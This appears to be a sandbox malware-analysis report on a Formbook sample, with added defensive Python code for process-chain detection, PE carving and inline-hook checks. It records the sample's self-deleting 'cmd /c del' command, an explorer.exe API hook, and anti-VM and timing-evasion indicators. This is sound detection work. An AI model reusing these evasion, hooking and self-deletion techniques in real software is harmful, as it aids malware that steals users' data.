Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00402D87 | 2_2_00402D87
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00402D90 | 2_2_00402D90
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041E59A | 2_2_0041E59A
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041E59D | 2_2_0041E59D
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00409E40 | 2_2_00409E40
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041D63B | 2_2_0041D63B
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00409E3B | 2_2_00409E3B
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041D71D | 2_2_0041D71D
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_0041CFA6 | 2_2_0041CFA6
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe | Code function: 2_2_00402FB0 | 2_2_00402FB0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04DBD466 | 5_2_04DBD466
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D0841F | 5_2_04D0841F
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04DC25DD | 5_2_04DC25DD
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D0D5E0 | 5_2_04D0D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04D22581 | 5_2_04D22581
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04DC1D55 | 5_2_04DC1D55
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04DC2D07 | 5_2_04DC2D07
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04CF0D20 | 5_2_04CF0D20
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04DC2EF7 | 5_2_04DC2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBD6165_2_04DBD616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D16E305_2_04D16E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DCDFCE5_2_04DCDFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC1FF15_2_04DC1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC28EC5_2_04DC28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0B0905_2_04D0B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A05_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC20A85_2_04DC20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB10025_2_04DB1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DCE8245_2_04DCE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFF9005_2_04CFF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D141205_2_04D14120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC22AE5_2_04DC22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB03DA5_2_04DB03DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBDBD25_2_04DBDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2EBB05_2_04D2EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC2B285_2_04DC2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D8925_2_00E5D892
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E25C5_2_00E5E25C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42D875_2_00E42D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42D905_2_00E42D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E59D5_2_00E5E59D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5E59A5_2_00E5E59A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E49E405_2_00E49E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D63B5_2_00E5D63B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E49E3B5_2_00E49E3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5CFA65_2_00E5CFA6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E42FB05_2_00E42FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00E5D71D5_2_00E5D71D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04CFB150 appears 45 times
Source: CI_PL #WS190903_20201016_XLs.exe Binary or memory string: OriginalFilename vs CI_PL #WS190903_20201016_XLs.exe (3 occurrences)
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.660535863.0000000005770000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameB2B.exe4 vs CI_PL #WS190903_20201016_XLs.exe
Source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.696087173.00000000016DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CI_PL #WS190903_20201016_XLs.exe
Source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695515904.00000000013F9000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs CI_PL #WS190903_20201016_XLs.exe
Matched rules (both rules matched every source listed below):
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.911663684.0000000004BC0000.00000004.00000001.sdmp, type: MEMORY
Source: 00000005.00000002.911632100.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.695420976.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000005.00000002.910775830.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.693748747.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.695379204.0000000001390000.00000040.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.657434154.0000000003521000.00000004.00000001.sdmp, type: MEMORY
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.400000.0.unpack, type: UNPACKEDPE
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@4/2
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CI_PL #WS190903_20201016_XLs.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
Source: CI_PL #WS190903_20201016_XLs.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: CI_PL #WS190903_20201016_XLs.exe Virustotal: Detection: 31%
Source: CI_PL #WS190903_20201016_XLs.exe ReversingLabs: Detection: 20%
Source: unknown Process created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'
Source: unknown Process created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe {path}
Source: unknown Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Process created: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe {path}
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe'
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: CI_PL #WS190903_20201016_XLs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: CI_PL #WS190903_20201016_XLs.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695262569.0000000001199000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.670384513.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695262569.0000000001199000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695558444.0000000001430000.00000040.00000001.sdmp, cmmon32.exe, 00000005.00000002.911715226.0000000004CD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CI_PL #WS190903_20201016_XLs.exe, 00000002.00000002.695558444.0000000001430000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.670384513.0000000005A00000.00000002.00000001.sdmp
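The process tree recorded above (the sample re-launching its own image as `{path}`, cmmon32.exe started from SysWOW64 with a bare command line, then `cmd.exe /c del` of the original file) is the pattern a detection engineer would want to catch in endpoint telemetry. The following is an added example and not part of the Joe Sandbox report or of the sample: three rules run over constructed Sysmon-style process-creation events modelled on the "Process created" lines. Only PID 7032 is taken from the report; the other PIDs, the parent links and the event field names are assumptions.

```python
"""Detection logic for the process chain in this report, run over
Sysmon-style process-creation events. Added example, not the sandbox's own
logic; the events are constructed to mirror the report's process tree (only
PID 7032 comes from the report, other PIDs and parent links are assumed)."""
from __future__ import annotations
import ntpath
import re

SAMPLE = r"C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe"

# Constructed events (pid, ppid, image, command line), modelled on the report.
SAMPLE_EVENTS = [
    {"pid": 7032, "ppid": 1000, "image": SAMPLE, "cmd": f"'{SAMPLE}'"},
    # the sample re-launches its own image ("{path}" is how the report shows it)
    {"pid": 7100, "ppid": 7032, "image": SAMPLE, "cmd": "{path}"},
    # a Windows binary started with nothing but its own path (parent not in the set)
    {"pid": 7200, "ppid": 1000, "image": r"C:\Windows\SysWOW64\cmmon32.exe",
     "cmd": r"C:\Windows\SysWOW64\cmmon32.exe"},
    {"pid": 7300, "ppid": 7200, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": f"/c del '{SAMPLE}'"},
    {"pid": 7400, "ppid": 7300, "image": r"C:\Windows\System32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

DEL_RE = re.compile(r"/c\s+del\s+['\"]?(?P<path>[^'\"]+?)['\"]?\s*$", re.IGNORECASE)
WINDOWS_DIRS = (r"C:\Windows\SysWOW64", r"C:\Windows\System32")


def _norm(path: str) -> str:
    """Case-fold and strip quotes so paths compare the way Windows sees them."""
    return ntpath.normcase(path.strip("'\""))


def find_suspicious_chains(events: list[dict]) -> list[dict]:
    by_pid = {e["pid"]: e for e in events}
    executed = {_norm(e["image"]) for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        base = ntpath.basename(e["image"]).lower()
        # 1. Child image == parent image: a process re-launching itself, which
        #    together with suspended-mode creation is the hollowing pattern.
        if parent and _norm(parent["image"]) == _norm(e["image"]):
            findings.append({"rule": "self_relaunch", "pid": e["pid"]})
        if base != "cmd.exe":
            continue
        # 2. cmd /c del of a binary that executed in this tree: self-deletion.
        m = DEL_RE.search(e["cmd"])
        if m and _norm(m.group("path")) in executed:
            findings.append({"rule": "delete_of_executed_binary",
                             "pid": e["pid"], "target": m.group("path")})
        # 3. cmd.exe spawned by a Windows system binary whose own command line
        #    is nothing but its image path (no arguments), as cmmon32.exe here.
        if parent:
            pimg = _norm(parent["image"])
            in_windows = any(pimg.startswith(_norm(d) + "\\") for d in WINDOWS_DIRS)
            if in_windows and _norm(parent["cmd"]) == pimg:
                findings.append({"rule": "system_binary_spawns_cmd", "pid": parent["pid"]})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding)
```

Rule 1 alone also fires on legitimate self-restarting software, so in production it is worth correlating it with the suspended-mode creation and the cross-process memory writes the report lists; rules 2 and 3 are specific enough to alert on by themselves.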

          Data Obfuscation:

.NET source code contains potential unpacker
Source: CI_PL #WS190903_20201016_XLs.exe, FormLogin.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.CI_PL #WS190903_20201016_XLs.exe.b0000.0.unpack, FormLogin.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.CI_PL #WS190903_20201016_XLs.exe.b0000.0.unpack, FormLogin.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.CI_PL #WS190903_20201016_XLs.exe.a10000.1.unpack, FormLogin.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.CI_PL #WS190903_20201016_XLs.exe.a10000.0.unpack, FormLogin.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 0_2_04520521 push ss; retf 0_2_04520524
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 0_2_0452052B push ss; retf 0_2_0452052E
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_004168D5 push ecx; iretd 2_2_004168DC
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0041C989 push eax; ret 2_2_0041C98D
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0040AC43 pushfd ; retf 2_2_0040AC44
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_00407DA5 push ecx; retf 2_2_00407DA6
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_00416DB3 push edi; retf 2_2_00416DB4
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04D4D0D1 push ecx; ret 5_2_04D4D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E568D5 push ecx; iretd 5_2_00E568DC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E5C989 push eax; ret 5_2_00E5C98D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E4AC43 pushfd ; retf 5_2_00E4AC44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E47DA5 push ecx; retf 5_2_00E47DA6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E56DB3 push edi; retf 5_2_00E56DB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E5CEB5 push eax; ret 5_2_00E5CF08
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E5CF6C push eax; ret 5_2_00E5CF72
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E5CF02 push eax; ret 5_2_00E5CF08
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_00E5CF0B push eax; ret 5_2_00E5CF72
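The .NET source flagged above hands a byte array to System.Reflection.Assembly::Load, so the next stage exists as a complete PE image inside the loader's data before it ever touches disk. The report does not say where that array is stored (resource, string, encrypted blob), so a static triage step is simply to carve every PE header out of the file or out of a memory dump such as the .sdmp regions listed earlier, and to check whether each one is a managed image, i.e. whether IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is populated as the static PE information notes for the sample itself. The following is an added example, not code from the report or the sample; the blob it scans is constructed inside the code from header-only images that parse but are not loadable, and the offsets are chosen for the demonstration.

```python
"""Carve embedded PE images out of a blob and flag managed (.NET) ones.
Added example, not code from the report or the sample. The blob below is
constructed: header-only PE images that parse but are not loadable."""
from __future__ import annotations
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
COM_DESCRIPTOR_INDEX = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
MAX_E_LFANEW = 0x1000              # sanity bound on the DOS stub size


def parse_pe_at(buf: bytes, off: int) -> dict | None:
    """Validate a PE header starting at buf[off:]; return its key fields or None."""
    if off + 0x40 > len(buf) or buf[off:off + 2] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    nt = off + e_lfanew
    if e_lfanew > MAX_E_LFANEW or nt + 24 > len(buf) or buf[nt:nt + 4] != IMAGE_NT_SIGNATURE:
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, nt + 4)
    opt = nt + 24
    if opt_size < 2 or opt + opt_size > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == PE32_MAGIC:            # NumberOfRvaAndSizes at 92, DataDirectory at 96
        dirs_off = 96
    elif magic == PE32PLUS_MAGIC:      # NumberOfRvaAndSizes at 108, DataDirectory at 112
        dirs_off = 112
    else:
        return None
    n_dirs = struct.unpack_from("<I", buf, opt + dirs_off - 4)[0]
    clr_rva = clr_size = 0
    entry = opt + dirs_off + 8 * COM_DESCRIPTOR_INDEX
    if n_dirs > COM_DESCRIPTOR_INDEX and entry + 8 <= opt + opt_size:
        clr_rva, clr_size = struct.unpack_from("<II", buf, entry)
    return {"offset": off, "machine": machine, "sections": nsections,
            "pe32plus": magic == PE32PLUS_MAGIC,
            "managed": clr_rva != 0 and clr_size != 0}


def carve_pe(buf: bytes) -> list[dict]:
    """Try every 'MZ' in the buffer and keep the ones that parse as a PE."""
    found, pos = [], buf.find(IMAGE_DOS_SIGNATURE)
    while pos != -1:
        hdr = parse_pe_at(buf, pos)
        if hdr:
            found.append(hdr)
        pos = buf.find(IMAGE_DOS_SIGNATURE, pos + 1)
    return found


def build_minimal_pe(managed: bool, pe32plus: bool = False) -> bytes:
    """Constructed test data: DOS header + PE signature + file header + optional header."""
    magic, dirs_off = (PE32PLUS_MAGIC, 112) if pe32plus else (PE32_MAGIC, 96)
    opt = bytearray(dirs_off + 16 * 8)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, dirs_off - 4, 16)                     # NumberOfRvaAndSizes
    if managed:                                                        # CLR directory present
        struct.pack_into("<II", opt, dirs_off + 8 * COM_DESCRIPTOR_INDEX, 0x2008, 0x48)
    machine = 0x8664 if pe32plus else 0x14C
    file_hdr = struct.pack("<HHIIIHH", machine, 2, 0, 0, 0, len(opt), 0x102)
    dos = bytearray(0x80)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, len(dos))                        # e_lfanew
    return bytes(dos) + IMAGE_NT_SIGNATURE + file_hdr + bytes(opt)


# Constructed "loader" blob: padding, a decoy 'MZ' that is not a PE, a managed
# PE32 image (what a loader would hand to Assembly.Load), then a native PE32+.
CONSTRUCTED_BLOB = (b"\x00" * 300 + b"MZ decoy, not a PE"
                    + build_minimal_pe(managed=True)
                    + b"\xAA" * 50
                    + build_minimal_pe(managed=False, pe32plus=True))

if __name__ == "__main__":
    for hdr in carve_pe(CONSTRUCTED_BLOB):
        print(hdr)
```

On a real loader the carved region is only the start: a managed hit gives you the assembly to load into a decompiler, while no hit at all usually means the array is decrypted or decompressed at runtime, in which case dumping the process after the constructor has run (as the 2.2 unpack sources above were) is the quicker route.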

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEC
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Process information set: NOOPENFILEERRORBOX (31 occurrences)
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
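The sandbox saw the first bytes of user32!PeekMessageA in explorer.exe replaced with 48 8B B8 84 4E EC. A memory-forensics check for this class of tampering compares a function's observed prologue with the bytes the DLL carries on disk and, where the patch is a recognisable trampoline, decodes where it jumps. The following is an added example, not part of the report: the clean prologue and the load address are hypothetical (read the real ones from the DLL on disk at the export's RVA and from the process's module list), and the only bytes taken from the report are the six patched ones, which the classifier reports as a patch it cannot decode as a trampoline.

```python
"""Inline-hook check: compare a function's observed first bytes with its clean
prologue and decode the trampoline if it is one of the usual forms. Added
example; the clean prologue and load address are hypothetical, and only the
six patched bytes come from the report."""
from __future__ import annotations
import struct

MASK64 = (1 << 64) - 1


def classify_prologue(expected: bytes, observed: bytes, func_addr: int) -> dict:
    """Return {'hooked', 'kind', 'target'} for the bytes observed at func_addr."""
    n = min(len(expected), len(observed))
    if n and observed[:n] == expected[:n]:
        return {"hooked": False, "kind": "clean", "target": None}
    # E9 rel32: jmp to func_addr + 5 + rel32 (rel32 is a signed 32-bit value)
    if len(observed) >= 5 and observed[0] == 0xE9:
        rel = struct.unpack_from("<i", observed, 1)[0]
        return {"hooked": True, "kind": "jmp_rel32", "target": (func_addr + 5 + rel) & MASK64}
    # FF 25 00000000 + imm64: x64 'jmp qword ptr [rip+0]' with the target inline
    if len(observed) >= 14 and observed[:6] == b"\xFF\x25\x00\x00\x00\x00":
        return {"hooked": True, "kind": "jmp_rip_indirect",
                "target": struct.unpack_from("<Q", observed, 6)[0]}
    # 68 imm32 C3: 'push target; ret', common in 32-bit hook engines
    if len(observed) >= 6 and observed[0] == 0x68 and observed[5] == 0xC3:
        return {"hooked": True, "kind": "push_ret",
                "target": struct.unpack_from("<I", observed, 1)[0]}
    # Differs from disk but is not a trampoline we recognise: still a patch,
    # and the analyst has to disassemble it by hand.
    return {"hooked": True, "kind": "unknown_patch", "target": None}


# Hypothetical clean x64 prologue and load address (assumptions for the demo):
# on a live host read the prologue from user32.dll on disk at the export's RVA,
# take the address from the module list, and fetch `observed` with ReadProcessMemory.
CLEAN_PROLOGUE = bytes.fromhex("4883EC28488B05")      # sub rsp,28h ; mov rax,[rip+..]
FUNC_ADDR = 0x7FF8_1234_5000

# The six bytes the report recorded at user32!PeekMessageA in explorer.exe.
REPORTED_PATCH = bytes.fromhex("488BB8844EEC")


def demo() -> list[dict]:
    """Constructed cases: clean, E9 trampoline, FF25 trampoline, the report's bytes."""
    cases = [
        CLEAN_PROLOGUE,
        b"\xE9" + struct.pack("<i", -0x1000) + CLEAN_PROLOGUE[5:],
        b"\xFF\x25\x00\x00\x00\x00" + struct.pack("<Q", 0x7FF9_0000_1234),
        REPORTED_PATCH,
    ]
    return [classify_prologue(CLEAN_PROLOGUE, c, FUNC_ADDR) for c in cases]


if __name__ == "__main__":
    for result in demo():
        print(result)
```

When a decoded target lands outside every loaded module's image range, the hook points into injected memory, which matches the report's other findings (a PE mapped into explorer.exe and a system process connecting to the network). Comparing against the on-disk bytes rather than a fixed prologue list is what keeps the check usable across Windows builds.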

          Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: Process Memory Space: CI_PL #WS190903_20201016_XLs.exe PID: 7032, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000E498E4 second address: 0000000000E498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000E49B5E second address: 0000000000E49B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Code function: 2_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe TID: 1320 Thread sleep time: -41500s >= -30000s
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe TID: 7056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6120 Thread sleep count: 38 > 30
Source: C:\Windows\explorer.exe TID: 6120 Thread sleep time: -76000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6680 Thread sleep time: -70000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed (2 occurrences)
Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.675357075.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} (2 occurrences)
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.676349696.000000000A9A0000.00000004.00000001.sdmp Binary or memory string: 0ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&`
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.671036141.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
